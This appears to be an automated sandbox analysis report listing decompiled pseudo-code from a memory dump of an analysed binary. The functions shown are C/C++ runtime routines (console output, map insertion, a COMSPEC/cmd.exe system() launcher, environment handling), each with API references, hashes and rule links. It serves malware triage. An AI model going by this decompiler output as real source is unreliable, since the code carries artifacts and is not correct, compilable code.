				signed int _v8;
				char _v12;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t72;
				char _t83;
				intOrPtr _t85;
				char _t86;
				intOrPtr _t88;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t100;
				void* _t103;
				intOrPtr _t104;
				void* _t107;
				char _t112;
				char _t113;
				intOrPtr* _t120;
				intOrPtr* _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				signed int _t126;
				intOrPtr _t137;
				signed int _t139;
				signed int _t143;
				intOrPtr* _t145;

				E00B4B97D( &_v12, 0);
				_t139 =  *0xb6ae84; // 0x0
				_v8 = _t139;
				_t72 = E00B43598(0xb6a178);
				_t116 = _a4;
				_t143 = E00B43612(_a4, _t72);
				if(_t143 != 0) {
					L5:
					E00B4B9D5( &_v12);
					return _t143;
				} else {
					if(_t139 == 0) {
						__eflags = E00B4367F(__ebx, _t116, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t120 =  &_v24;
							E00B4345D(_t120);
							E00B4D24A( &_v24, 0xb66510);
							asm("int3");
							_push(0x2c);
							E00B64BBE();
							_v44 = __edx;
							_t145 = _t120;
							_v36 = _t145;
							__eflags = 0;
							_v28 = 0;
							_t121 = __edx;
							_t137 = __edx + 1;
							do {
								_t83 =  *_t121;
								_t121 = _t121 + 1;
								__eflags = _t83;
							} while (_t83 != 0);
							_t122 = _t121 - _t137;
							_v32 = _t122;
							_t85 =  *((intOrPtr*)( *_t145 + 4));
							_t112 =  *((intOrPtr*)(_t85 + _t145 + 0x20));
							_t86 =  *((intOrPtr*)(_t85 + _t145 + 0x24));
							__eflags = _t86;
							if(__eflags < 0) {
								L16:
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x30], xmm0");
								_t86 = _v48;
								_t113 = _v52;
							} else {
								if(__eflags > 0) {
									L15:
									_t113 = _t112 - _t122;
									asm("sbb eax, edi");
								} else {
									__eflags = _t112;
									if(_t112 <= 0) {
										goto L16;
									} else {
										__eflags = _t86;
										if(__eflags < 0) {
											goto L16;
										} else {
											if(__eflags > 0) {
												goto L15;
											} else {
												__eflags = _t112 - _t122;
												if(_t112 <= _t122) {
													goto L16;
												} else {
													goto L15;
												}
											}
										}
									}
								}
							}
							_v24 = _t86;
							E00B47B12( &_v60, _t145);
							__eflags = _v56;
							if(_v56 != 0) {
								_v8 = 0;
								_t124 =  *_t145;
								_t88 =  *((intOrPtr*)(_t124 + 4));
								__eflags = ( *(_t88 + _t145 + 0x14) & 0x000001c0) - 0x40;
								if(( *(_t88 + _t145 + 0x14) & 0x000001c0) == 0x40) {
									L27:
									_t93 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 4)) + _t145 + 0x38)))) + 0x24))(_v44, _v32, 0);
									__eflags = _t93 - _v32;
									if(_t93 != _v32) {
										goto L34;
									} else {
										__eflags = _t137;
										if(_t137 != 0) {
											goto L34;
										} else {
											_t100 = _v24;
											while(1) {
												__eflags = _t100;
												if(__eflags < 0) {
													break;
												}
												if(__eflags > 0) {
													L33:
													_v44 =  *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x40));
													_t103 = E00B47BAB( *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x38)), _v44);
													__eflags = _t103 - 0xffffffff;
													if(_t103 != 0xffffffff) {
														_t113 = _t113 + 0xffffffff;
														_v52 = _t113;
														_t100 = _v24;
														asm("adc eax, 0xffffffff");
														_v24 = _t100;
														_v48 = _t100;
														continue;
													} else {
														goto L34;
													}
												} else {
													__eflags = _t113;
													if(_t113 <= 0) {
														break;
													} else {
														goto L33;
													}
												}
												goto L37;
											}
											_t126 = 0;
										}
									}
								} else {
									_t104 = _v24;
									while(1) {
										__eflags = _t104;
										if(__eflags < 0) {
											break;
										}
										if(__eflags > 0) {
											L24:
											_v40 =  *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x40));
											_t107 = E00B47BAB( *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x38)), _v40);
											__eflags = _t107 - 0xffffffff;
											if(_t107 == 0xffffffff) {
												L34:
												_t126 = 4;
												_v28 = _t126;
											} else {
												_t113 = _t113 + 0xffffffff;
												_v52 = _t113;
												_t104 = _v24;
												asm("adc eax, 0xffffffff");
												_v24 = _t104;
												_v48 = _t104;
												continue;
											}
										} else {
											__eflags = _t113;
											if(_t113 <= 0) {
												break;
											} else {
												goto L24;
											}
										}
										goto L37;
									}
									_t124 =  *_t145;
									goto L27;
								}
								L37:
								_t95 =  *((intOrPtr*)( *_t145 + 4));
								 *((intOrPtr*)(_t95 + _t145 + 0x20)) = 0;
								 *((intOrPtr*)(_t95 + _t145 + 0x24)) = 0;
								_v8 = _v8 | 0xffffffff;
							} else {
								_t126 = 4;
							}
							__eflags =  *((intOrPtr*)( *_t145 + 4)) + _t145;
							E00B4759B(_t126, 0);
							E00B47AE8( &_v60, __eflags);
							E00B64B2D();
							return _t145;
						} else {
							_t143 = _v8;
							E00B4BBA2(__eflags, _t143);
							 *((intOrPtr*)( *_t143 + 4))();
							 *0xb6ae84 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t139;
						goto L5;
					}
				}
			}

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B4767B

Part of subcall function 00B43598: std::_Lockit::_Lockit.LIBCPMT ref: 00B435A9
Part of subcall function 00B43598: std::_Lockit::~_Lockit.LIBCPMT ref: 00B435C3

std::_Facet_Register.LIBCPMT ref: 00B476C1
std::_Lockit::~_Lockit.LIBCPMT ref: 00B476D7
__CxxThrowException@8.LIBVCRUNTIME ref: 00B476F3

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: d3de73f622e8e6f294581c15dda8854bfc4903650cb0f47920244f9517ef137c
Instruction ID: bcca919c73e127334021b4bfb8e1bc92c817c388440e883a2e168ab0706eeb0c
Opcode Fuzzy Hash: d3de73f622e8e6f294581c15dda8854bfc4903650cb0f47920244f9517ef137c
Instruction Fuzzy Hash: B701D232900514ABCB00EB68C915C9DB7F8EF81750B2500D5FA01B7291EF34DF01EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B64782, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B64782(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xb699a0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00B6476B();
					E00B6472D();
					_t13 = WriteConsoleW( *0xb699a0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00b6479f
0x00b647a3
0x00b647b0
0x00b647b5
0x00b647d0
0x00b647d0
0x00b647d6

APIs

WriteConsoleW.KERNEL32(00B513E1,?,?,00000000,00B513E1,?,00B6424E,00B513E1,00000001,00B513E1,00B513E1,?,00B6268D,00000000,8304488B,00B513E1), ref: 00B64799
GetLastError.KERNEL32(?,00B6424E,00B513E1,00000001,00B513E1,00B513E1,?,00B6268D,00000000,8304488B,00B513E1,00000000,00B513E1,?,00B62BE1,00000010), ref: 00B647A5

Part of subcall function 00B6476B: CloseHandle.KERNEL32(FFFFFFFE,00B647B5,?,00B6424E,00B513E1,00000001,00B513E1,00B513E1,?,00B6268D,00000000,8304488B,00B513E1,00000000,00B513E1), ref: 00B6477B

___initconout.LIBCMT ref: 00B647B5

Part of subcall function 00B6472D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B6475C,00B6423B,00B513E1,?,00B6268D,00000000,8304488B,00B513E1,00000000), ref: 00B64740

WriteConsoleW.KERNEL32(00B513E1,?,?,00000000,?,00B6424E,00B513E1,00000001,00B513E1,00B513E1,?,00B6268D,00000000,8304488B,00B513E1,00000000), ref: 00B647CA

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 99e221b944c41b370d0e8b7ffbf5d1de2e46d09af5fccb61c4ffae346712f2d2
Instruction ID: c7f1569d05cdd591483dcc61c28b5bbfc6b670c492bb80068e74370509b2c834
Opcode Fuzzy Hash: 99e221b944c41b370d0e8b7ffbf5d1de2e46d09af5fccb61c4ffae346712f2d2
Instruction Fuzzy Hash: A6F01C36442515BBCF221F91DC0899A3F6AFB0B7A1B004055FA08A6160CF769C20DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B48521, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B48521(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				signed char _v28;
				intOrPtr _t79;
				signed char _t83;
				void* _t85;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t91;
				intOrPtr* _t92;
				void* _t93;
				intOrPtr* _t96;
				intOrPtr* _t100;
				intOrPtr* _t101;
				void* _t120;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t136;
				intOrPtr* _t137;
				intOrPtr* _t138;

				_t124 = __ecx;
				_t120 = __ebx;
				_t79 =  *((intOrPtr*)(__ecx + 4));
				if(_t79 >= 0x3fffffe) {
					E00B484B2(_a20);
					E00B4BE84("map/set<T> too long");
					asm("int3");
					_push(0xc);
					E00B64BBE();
					_t121 = _t124;
					_v8 = _v8 & 0x00000000;
					_t132 =  *_t121;
					_t136 =  *((intOrPtr*)(_t132 + 4));
					_t83 = 1;
					_v28 = 1;
					while( *((char*)(_t136 + 0xd)) == 0) {
						_t132 = _t136;
						_t52 = _t136 + 0x10; // 0x10
						_t93 = _t52;
						if(_a8 == 0) {
							_t83 = E00B46D65(_a12, _t93);
						} else {
							_t83 = E00B46D65(_t93, _a12) ^ 0x00000001;
						}
						_v28 = _t83;
						if(_t83 == 0) {
							_t136 =  *((intOrPtr*)(_t136 + 8));
						} else {
							_t136 =  *_t136;
						}
					}
					_t137 = _t132;
					_v24 = _t137;
					if(_t83 == 0) {
						L47:
						_t74 = _t137 + 0x10; // 0x11
						_t85 = E00B46D65(_t74, _a12);
						_push(_a16);
						if(_t85 == 0) {
							E00B484B2();
							_t87 = _a4;
							 *_t87 = _t137;
							 *((char*)(_t87 + 4)) = 0;
						} else {
							_push(_t124);
							_push(_t132);
							_push(_v28);
							goto L35;
						}
					} else {
						if(_t132 !=  *((intOrPtr*)( *_t121))) {
							if( *((char*)(_t132 + 0xd)) == 0) {
								_t91 =  *_t132;
								if( *((char*)(_t91 + 0xd)) == 0) {
									do {
										_t137 = _t91;
										_t91 =  *((intOrPtr*)(_t137 + 8));
									} while ( *((char*)(_t91 + 0xd)) == 0);
									goto L46;
								} else {
									while(1) {
										_t92 =  *((intOrPtr*)(_t137 + 4));
										if( *((char*)(_t92 + 0xd)) != 0 || _t137 !=  *_t92) {
											break;
										}
										_t137 = _t92;
										_v24 = _t137;
									}
									if( *((char*)(_t137 + 0xd)) == 0) {
										_t137 = _t92;
										goto L46;
									}
								}
							} else {
								_t137 =  *((intOrPtr*)(_t132 + 8));
								L46:
								_v24 = _t137;
							}
							goto L47;
						} else {
							_push(_a16);
							_push(_t124);
							_push(_t132);
							_push(1);
							L35:
							_push( &_a8);
							_t89 = E00B48521(_t121, _t121, _t132, _t137);
							_t87 = _a4;
							 *_t87 =  *_t89;
							 *((char*)(_t87 + 4)) = 1;
						}
					}
					E00B64B2D();
					return _t87;
				} else {
					_push(__esi);
					_push(__edi);
					_t133 = _a20;
					 *((intOrPtr*)(__ecx + 4)) = _t79 + 1;
					_t96 = _a12;
					 *((intOrPtr*)(_t133 + 4)) = _t96;
					_t127 =  *__ecx;
					if(_t96 != _t127) {
						if(_a8 == 0) {
							 *((intOrPtr*)(_t96 + 8)) = _t133;
							_t128 =  *__ecx;
							if(_t96 ==  *((intOrPtr*)(_t128 + 8))) {
								 *((intOrPtr*)(_t128 + 8)) = _t133;
							}
						} else {
							 *_t96 = _t133;
							_t130 =  *__ecx;
							if(_t96 ==  *_t130) {
								 *_t130 = _t133;
							}
						}
					} else {
						 *((intOrPtr*)(_t127 + 4)) = _t133;
						 *((intOrPtr*)( *__ecx)) = _t133;
						 *((intOrPtr*)( *__ecx + 8)) = _t133;
					}
					_t138 = _t133;
					if( *((char*)( *((intOrPtr*)(_t133 + 4)) + 0xc)) == 0) {
						_push(_t120);
						do {
							_t101 =  *((intOrPtr*)(_t138 + 4));
							_t122 =  *((intOrPtr*)(_t101 + 4));
							_t129 =  *_t122;
							if(_t101 != _t129) {
								if( *((char*)(_t129 + 0xc)) != 0) {
									if(_t138 ==  *_t101) {
										_t138 = _t101;
										E00B475CA(_t124, _t138);
									}
									 *((char*)( *((intOrPtr*)(_t138 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)) + 0xc)) = 0;
									E00B4760D(_t124,  *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)));
								} else {
									goto L16;
								}
							} else {
								_t129 =  *((intOrPtr*)(_t122 + 8));
								if( *((char*)(_t129 + 0xc)) == 0) {
									L16:
									 *((char*)(_t101 + 0xc)) = 1;
									 *((char*)(_t129 + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)) + 0xc)) = 0;
									_t138 =  *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4));
								} else {
									if(_t138 ==  *((intOrPtr*)(_t101 + 8))) {
										_t138 = _t101;
										E00B4760D(_t124, _t138);
									}
									 *((char*)( *((intOrPtr*)(_t138 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)) + 0xc)) = 0;
									E00B475CA(_t124,  *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)));
								}
							}
						} while ( *((char*)( *((intOrPtr*)(_t138 + 4)) + 0xc)) == 0);
					}
					 *((char*)( *((intOrPtr*)( *_t124 + 4)) + 0xc)) = 1;
					_t100 = _a4;
					 *_t100 = _t133;
					return _t100;
				}
			}

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00B4863B
__EH_prolog3_catch.LIBCMT ref: 00B48648

Strings

map/set<T> too long, xrefs: 00B48636

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_catchXinvalid_argumentstd::_
String ID: map/set<T> too long
API String ID: 4202626062-1285458680
Opcode ID: 9ccebb031133ca895f5a66a0f1c3b4bc8630829be0e3241a4874cee8b91c3f2e
Instruction ID: c8a41b34e66cc2519a1d5535b96072d0217310f234eb287253fcef2a24e9737b
Opcode Fuzzy Hash: 9ccebb031133ca895f5a66a0f1c3b4bc8630829be0e3241a4874cee8b91c3f2e
Instruction Fuzzy Hash: 485126706046809FDB51CF18C188B59FBE1EF66324F1AC5C9E8598B262C775EE80EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B5097A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B5097A(signed int __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t18;
				void* _t21;
				char* _t22;
				signed int* _t29;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t46;
				signed int _t49;
				signed int _t55;
				void* _t57;

				L0:
				while(1) {
					L0:
					_t37 = __ebx;
					_pop(_t53);
					_t54 = _t55;
					_t18 =  *0xb69014; // 0xce6f0fb5
					_v8 = _t18 ^ _t55;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t46 = _a4;
					_t49 = 0;
					_v28 = 0;
					_t21 = E00B5185E( &_v28, 0, "COMSPEC");
					_t57 = _t55 - 0x18 + 0xc;
					if(_t21 == 0 || _t21 != 0x16) {
						break;
					}
					L15:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00B52919();
					asm("int3");
				}
				L3:
				if(_t46 != 0) {
					_t22 = _v32;
					_v28 = _t22;
					_v24 = "/c";
					_v20 = _t46;
					_v16 = _t49;
					if(_t22 == 0) {
						L13:
						_push(_t49);
						_v28 = "cmd.exe";
						_t49 = E00B56D9C(_t37, _t46, _t49, _t49, "cmd.exe",  &_v28);
					} else {
						_t46 =  *((intOrPtr*)(E00B55BBD()));
						_t29 = E00B55BBD();
						_push(_t49);
						 *_t29 = _t49;
						_push( &_v28);
						_t31 = E00B56AC5(_t49, _v28);
						_t57 = _t57 + 0x10;
						_t37 = _t31;
						_t32 = E00B55BBD();
						if(_t37 == 0xffffffff) {
							if( *_t32 == 2 ||  *((intOrPtr*)(E00B55BBD())) == 0xd) {
								 *((intOrPtr*)(E00B55BBD())) = _t46;
								goto L13;
							} else {
								_t49 = _t49 | 0xffffffff;
							}
						} else {
							 *_t32 = _t46;
							_t49 = _t37;
						}
					}
				} else {
					if(_v32 != _t49) {
						_t35 = E00B56EA8(_t37, _t49, _v32, _t49);
						asm("sbb esi, esi");
						_t49 =  ~_t35 + 1;
					}
				}
				E00B564B8(_v32);
				return E00B4AE43(_v12 ^ _t54);
			}

APIs

_free.LIBCMT ref: 00B50956

Strings

COMSPEC, xrefs: 00B50897
cmd.exe, xrefs: 00B5093E, 00B50944

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: COMSPEC$cmd.exe
API String ID: 269201875-2256226045
Opcode ID: e65158f23a713139cc395c7f1e5c3e9a7fdb0925dddf2d85645df5d030fbef7a
Instruction ID: 224764720d3e285de2a336df5b5cbf286f262e90e6062d9f08e42b1966079534
Opcode Fuzzy Hash: e65158f23a713139cc395c7f1e5c3e9a7fdb0925dddf2d85645df5d030fbef7a
Instruction Fuzzy Hash: 3A31B5719111199F9B20BF998846BAFBBF8DE41322B2101E5FD14A7251EB745E08CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B60E95, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B60E95(void* __ebx, void* __edi, void* _a4, signed int* _a8) {
				intOrPtr _v0;
				intOrPtr* _v8;
				signed int _v12;
				char _v14;
				short _v16;
				signed int _v20;
				char _v24;
				char _v25;
				signed int* _v32;
				char* _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v60;
				char* _v84;
				signed int* _v96;
				intOrPtr _v124;
				char _v136;
				void* __ecx;
				intOrPtr* _t97;
				void* _t107;
				signed int _t110;
				signed int* _t112;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr _t118;
				void* _t120;
				signed int* _t122;
				void* _t126;
				void* _t127;
				signed int* _t131;
				intOrPtr _t141;
				void* _t142;
				void* _t150;
				void* _t151;
				void* _t152;
				intOrPtr _t154;
				intOrPtr* _t156;
				intOrPtr* _t158;
				intOrPtr _t162;
				void* _t163;
				intOrPtr _t164;
				intOrPtr _t170;
				intOrPtr* _t172;
				intOrPtr _t173;
				signed int _t175;
				char* _t177;
				signed int* _t179;
				signed int _t180;
				intOrPtr _t181;
				void* _t184;
				intOrPtr* _t186;
				signed int* _t188;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr* _t203;
				intOrPtr* _t213;
				signed int _t215;
				intOrPtr _t219;
				intOrPtr* _t220;
				intOrPtr* _t224;
				signed int _t225;
				char _t226;
				intOrPtr* _t227;
				signed int _t228;
				intOrPtr* _t230;
				void* _t231;
				intOrPtr* _t232;
				intOrPtr* _t233;
				signed int _t235;
				void* _t238;
				char* _t239;
				signed int _t241;
				char* _t244;
				void* _t245;
				signed int _t246;
				intOrPtr _t248;
				void* _t250;
				signed int _t252;
				signed int _t254;
				void* _t255;
				void* _t256;

				_push(__ebx);
				_t175 = 0;
				 *_a8 =  *_a8 & 0x00000000;
				_t97 = _a4;
				_t224 = _t97;
				_push(__edi);
				_v8 = _t97;
				_t186 =  *_t97;
				if(_t186 == 0) {
					L5:
					_t177 = 1;
				} else {
					do {
						_t250 = _t186 + 1;
						do {
							_t173 =  *_t186;
							_t186 = _t186 + 1;
						} while (_t173 != 0);
						_t224 = _t224 + 4;
						_t175 = _t175 + _t186 - _t250 + 1;
						_t186 =  *_t224;
					} while (_t186 != 0);
					if(_t175 <= 1) {
						goto L5;
					}
				}
				_t241 = E00B598AF(_t177, 1);
				_pop(_t188);
				if(_t241 != 0) {
					_t235 = _t241;
					_t100 =  *_a4;
					if( *_a4 == 0) {
						L14:
						 *_a8 = _t241;
						goto L15;
					} else {
						while(1) {
							_t107 = E00B56383(_t235, _t241 - _t235 + _t177, _t100);
							_t254 = _t254 + 0xc;
							if(_t107 != 0) {
								break;
							}
							_t232 = _v8;
							_t220 =  *_t232;
							_v8 = _t220 + 1;
							do {
								_t170 =  *_t220;
								_t220 = _t220 + 1;
							} while (_t170 != 0);
							_t188 = _t220 - _v8;
							_t233 = _t232 + 4;
							_t239 = _t235 + _t188;
							_v8 = _t233;
							 *_t239 = 0x20;
							_t235 = _t239 + 1;
							_t100 =  *_t233;
							if(_t100 != 0) {
								continue;
							} else {
								 *((char*)(_t235 - 1)) = _t100;
								goto L14;
							}
							goto L87;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00B52919();
						asm("int3");
						_t252 = _t254;
						_t255 = _t254 - 0x34;
						_t110 =  *0xb69014; // 0xce6f0fb5
						_v48 = _t110 ^ _t252;
						_t112 = _v32;
						_push(_t241);
						_t244 = _v36;
						_v84 = _t244;
						 *_t112 =  *_t112 & 0x00000000;
						_v96 = _t112;
						if(_t244 != 0) {
							_v44 = _v44 & 0x00000000;
							_v24 = 0x74737953;
							_v20 = 0x6f526d65;
							_v16 = 0x746f;
							_v14 = 0;
							_t115 = E00B5185E( &_v44, 0,  &_v24);
							_t256 = _t255 + 0xc;
							if(_t115 == 0) {
								_t116 = _v44;
								if(_t116 == 0) {
									_v36 = 0xb;
								} else {
									_t231 = _t116 + 1;
									do {
										_t219 =  *_t116;
										_t116 = _t116 + 1;
									} while (_t219 != 0);
									_v36 = _t116 - _t231 + 0xc;
								}
								_t190 =  *_t244;
								_push(_t177);
								_push(_t235);
								_t179 = 2;
								_v32 = _t179;
								if(_t190 != 0) {
									_t230 = _t244;
									do {
										_t238 = _t190 + 1;
										do {
											_t164 =  *_t190;
											_t190 = _t190 + 1;
										} while (_t164 != 0);
										_t230 = _t230 + 4;
										_t179 = _t179 + _t190 - _t238 + 1;
										_t190 =  *_t230;
									} while (_t190 != 0);
									_v32 = _t179;
								}
								_t235 = E00B5AA59(_t190);
								if(_t235 != 0) {
									_t225 = _t235;
									_v56 = _t235;
									if( *_t235 != 0x3d) {
										do {
											_t215 = _t225;
											_t184 = _t215 + 1;
											do {
												_t163 =  *_t215;
												_t215 = _t215 + 1;
											} while (_t163 != 0);
											_t225 = _t225 + 1 + _t215 - _t184;
										} while ( *_t225 != 0x3d);
										_v56 = _t225;
									}
									_t180 = _t225;
									if( *_t225 == 0x3d) {
										while( *((char*)(_t180 + 1)) != 0 &&  *((char*)(_t180 + 2)) == 0x3a &&  *((char*)(_t180 + 3)) == 0x3d) {
											_t213 = _t180 + 4;
											_v40 = _t213 + 1;
											do {
												_t162 =  *_t213;
												_t213 = _t213 + 1;
											} while (_t162 != 0);
											_t180 = _t180 + 5 + _t213 - _v40;
											if( *_t180 == 0x3d) {
												continue;
											}
											goto L47;
										}
									}
									L47:
									_t181 = _t180 - _t225;
									_v52 = _t244;
									_t226 =  *_t244;
									_v40 = _t181;
									while(_t226 != 0) {
										_t45 =  &_v24; // 0x74737953
										_t191 = _t45;
										_t245 = _t191 + 1;
										do {
											_t118 =  *_t191;
											_t191 = _t191 + 1;
										} while (_t118 != 0);
										_t47 =  &_v24; // 0x74737953
										_t120 = E00B616F6(_t226, _t47, _t191 - _t245);
										_t256 = _t256 + 0xc;
										if(_t120 == 0) {
											_v25 = 1;
											_t122 = _v32 + _t181;
										} else {
											_t158 = _v52 + 4;
											_v52 = _t158;
											_t226 =  *_t158;
											continue;
										}
										L54:
										_v32 = _t122;
										_t244 = E00B598AF(_t122, 1);
										if(_t244 != 0) {
											_t124 = _v40;
											_t177 = _t244;
											if(_v40 == 0) {
												_t188 = _v32;
											} else {
												E00B4D670(_t244, _v56, _t124);
												_t154 = _v40;
												_t256 = _t256 + 0xc;
												_t188 = _v32 - _t154;
												_v32 = _t188;
												_t177 = _t244 + _t154;
											}
											_t126 =  *_v48;
											while(_t126 != 0) {
												_t127 = E00B56383(_t177, _t188, _t126);
												_t256 = _t256 + 0xc;
												if(_t127 != 0) {
													goto L79;
												} else {
													_t227 = _v48;
													_t203 =  *_t227;
													_v40 = _t203 + 1;
													do {
														_t141 =  *_t203;
														_t203 = _t203 + 1;
													} while (_t141 != 0);
													_t142 = _t203 - _v40 + 1;
													_t188 = _v32 - _t142;
													_t177 = _t177 + _t142;
													_t228 = _t227 + 4;
													_v32 = _t188;
													_v48 = _t228;
													_t126 =  *_t228;
													continue;
												}
												goto L87;
											}
											if(_v25 != _t126) {
												L72:
												if(_t177 == _t244) {
													 *_t177 = 0;
													_t177 = _t177 + 1;
												}
												 *_t177 = 0;
												 *_v60 = _t244;
												_t248 = 0;
												goto L75;
											} else {
												_t150 = E00B56383(_t177, _v36,  &_v24);
												_t256 = _t256 + 0xc;
												if(_t150 != 0) {
													goto L79;
												} else {
													_t151 = E00B60E2C(_t177, _v36, 0xb375c0);
													_t256 = _t256 + 0xc;
													if(_t151 != 0) {
														goto L79;
													} else {
														if(_v44 == _t151) {
															L71:
															_t177 = _t177 + _v36;
															goto L72;
														} else {
															_t152 = E00B60E2C(_t177, _v36, _v44);
															_t256 = _t256 + 0xc;
															if(_t152 != 0) {
																goto L79;
															} else {
																goto L71;
															}
														}
													}
												}
											}
										} else {
											E00B55B87(0xe);
											_t156 = E00B55BBD();
											_t248 = 0xc;
											 *_t156 = _t248;
											L75:
											E00B564B8(0);
											goto L76;
										}
										goto L87;
									}
									_v25 = _t226;
									_t122 = _v32 + _t181 + _v36;
									goto L54;
								} else {
									_t248 = 0x16;
									L76:
									E00B564B8(_t235);
									goto L77;
								}
							} else {
								if(_t115 == 0x16) {
									L79:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E00B52919();
									asm("int3");
									_push(_t252);
									_push(_t188);
									_push(_t188);
									_push(_t244);
									_t246 = 0;
									_v136 = 0;
									if(E00B60E95(_t177, _t235, _v124,  &_v136) == 0) {
										_t131 =  &_v20;
										_v20 = 0;
										_push(_t131);
										_push(_v0);
										L17();
										if(_t131 == 0) {
											 *_a4 = _v16;
											 *_a8 = _v20;
											E00B564B8(0);
											E00B564B8(0);
										} else {
											E00B564B8(_v20);
											E00B564B8(_v16);
											_t246 = 0xffffffff;
										}
									} else {
										E00B564B8(_v16);
										_t246 = 0xffffffff;
									}
									return _t246;
								} else {
									_t248 =  *((intOrPtr*)(E00B55BBD()));
									L77:
									E00B564B8(_v44);
									goto L78;
								}
							}
						} else {
							L78:
							return E00B4AE43(_v12 ^ _t252);
						}
					}
				} else {
					E00B55B87(8);
					_t172 = E00B55BBD();
					_push(0xc);
					_pop(0);
					 *_t172 = 0;
					L15:
					E00B564B8(0);
					return 0;
				}
				L87:
			}

APIs

__dosmaperr.LIBCMT ref: 00B60EE6
